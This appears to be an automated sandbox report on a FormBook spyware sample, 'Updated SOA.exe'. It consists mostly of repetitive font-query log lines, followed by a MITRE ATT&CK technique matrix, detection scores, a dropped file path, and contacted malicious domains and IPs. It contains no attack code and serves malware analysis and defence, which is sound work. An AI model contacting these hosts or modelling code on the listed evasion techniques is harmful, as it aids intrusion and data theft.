          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook

          Remote Access Functionality:

          Yara detected FormBook

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Scheduled Task/Job 1 | Scheduled Task/Job 1 | Process Injection 612 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 321 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Shared Modules 1 | Boot or Logon Initialization Scripts | Scheduled Task/Job 1 | Disable or Modify Tools 1 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 31 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 612 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap |  | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | File and Directory Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 3 | Cached Domain Credentials | System Information Discovery 112 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 13 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | File Deletion 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue

          Behavior Graph

          [Behavior graph: ID 486924; Sample: Updated SOA.exe; Start date: 21/09/2021; Architecture: WINDOWS; Score: 100]


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          Updated SOA.exe | 32% | Virustotal |
          Updated SOA.exe | 24% | ReversingLabs | Win32.Spyware.Noon
          Updated SOA.exe | 100% | Joe Sandbox ML |

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Roaming\oydxFbGhGlh.exe | 100% | Joe Sandbox ML |
          C:\Users\user\AppData\Roaming\oydxFbGhGlh.exe | 24% | ReversingLabs | Win32.Spyware.Noon

          Unpacked PE Files

          Source | Detection | Scanner | Label
          7.2.Updated SOA.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          Source | Detection | Scanner | Label
          newstodayupdate.com | 0% | Virustotal |

          URLs


          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.emilfaucets.com | 23.92.26.10 | true | true |  | unknown
          www.invetorsbank.com | 185.53.177.12 | true | true |  | unknown
          newstodayupdate.com | 34.102.136.180 | true | false |  | unknown
          www.kutahyaescortbayanlarim.xyz | 104.21.2.184 | true | true |  | unknown
